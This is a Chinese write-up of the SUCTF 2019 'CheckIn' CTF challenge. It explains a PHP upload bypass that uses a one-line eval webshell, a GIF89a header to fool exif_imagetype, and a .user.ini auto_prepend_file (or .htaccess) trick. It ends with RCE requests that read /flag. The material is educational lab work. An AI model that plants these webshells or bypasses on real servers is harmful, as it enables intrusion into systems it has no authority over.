[SUCTF 2019]CheckIn 1

知识点:    

.user.ini    .htaccess  //知识点统细讲放到最后,建议学习一下连接里面的内容

文件上传内容检测    

一句话木马

rce命令执行、蚁剑连接

题解:

1.正常的一句话木马

这里上传含有一句话木马的 jpg、png、gif 都会回显 <? in contents : 我们看了判断出题目对文件内容做了限制

<?php @eval($_REQUEST['cmd']);?>   //开始上传图片中写入的一句话木马


<script language="php">eval($_REQUEST['cmd']);</script>     // 用于绕过 <?

还可以在前面加 幻术头绕过   GIF89a(GIF图片的ascii 值)

2.exif_imagetype()函数限制

然后这里还用exif_imagetype() 函数 对上传文件后缀进行了限制

该函数会读取图像的第一个字节,并检查其签名,如果发现了恰当的签名则会返回相应的常量,否则返回false ,我们可以在一句话木马前面加上一个GIF89a 就可以绕过了

GIF89a
<script language='php'>eval($_REQUEST['cmd']);</script>


//三种图片的前缀
JPG :FF D8 FF E0 00 10 4A 46 49 46(16进制编码)
GIF:47 49 46 38 39 61(ascll值是GIF89a)
PNG: 89 50 4E 47

3.user.ini文件

到现在我们就可以上传成功一个图片了,但它还是不能进行解析,这里我们应该怎末想????

在学习文件上传时应该都学过, .htaccess 文件,可以把后缀为其他类型的图片解析成php 图片,这里感兴趣的可以上传试一下

<FilesMatch "shana">
SetHandler application/x-httpd-php
</FilesMatch>

但是这里我们引入一个新的php配置文件 .user.ini

这里如果我们上传一个.user.ini 文件,那么当我们访问目录中的任何php文件时,都会调用.user.ini中指的文件以php的形式进行读取我
们在user.ini设置文件

//上传.user.ini文件,条件如下:

(1)服务器脚本语言为PHP
(2)对应目录下面有可执行的php文件
(3)服务器使用CGI/FastCGI模式

//auto_prepend_file是在文件前插入,而auto_append_file是在文件最后才插入。

上传的文件内容
GIF89a                                           
auto_prepend_file=b.gif       //需要注意上穿的文件名字要和设定的名字一样,这里可以设定多个

成功上传 .user.ini

上传成功b.gif

GIF89a 
<script language='php'>eval($_REQUEST['cmd']);</script>

4.用传进去的cmd 进行rce

然后利用传如shell (cmd参数) ,进行传参

uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?cmd=var_dump(scandir(“/”)); // 扫描当前目录下的文件,并打印出来

uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?cmd=system(‘cat /flag’);

uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php?cmd=var_dump(file_get_contents(“/flag”));

或者直接利用蚁剑连接也可以拿到flag

题目涉及知识点详解

一、.user.ini .htaccess 文件

php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。

那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htaccess有局限性。

举个例子:
/*这里我们前面提过的两个.user.ini配置  
auto_prepend_file是在文件前插入
auto_append_file是在文件最后才插入*/

1.这里我们在user.ini 中设置
auto_prepend_file=b.gif

2.在b.gif中设置 一句话木马

3.还有个php文件 如:前面做题中的index.php    

如果这三个条件在同一个目录下面,就会出先问题,这里就相当于 在index.php中写了include "b.gif" , 可以进行文件包含,导致的后果是:当我们对目录中的index.php进行访问的时候,会调用.usre.ini 中的文件把b.gif文件以php的形式进行读取,造成userini的漏洞


局限
在.user.ini中使用这条配置也说了是在同目录下的其他.php 文件中包含配置中所指定的文件,也就是说需要该目录下存在.php 文件,通常在文件上传中,一般是专门有一个目录用来存在图片,可能小概率会存在.php 文件。

但是有时可以使用 ../ 来将文件上传到其他目录,达到一个利用的效果。

原文地址:http://www.cnblogs.com/zhiliu/p/16825982.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性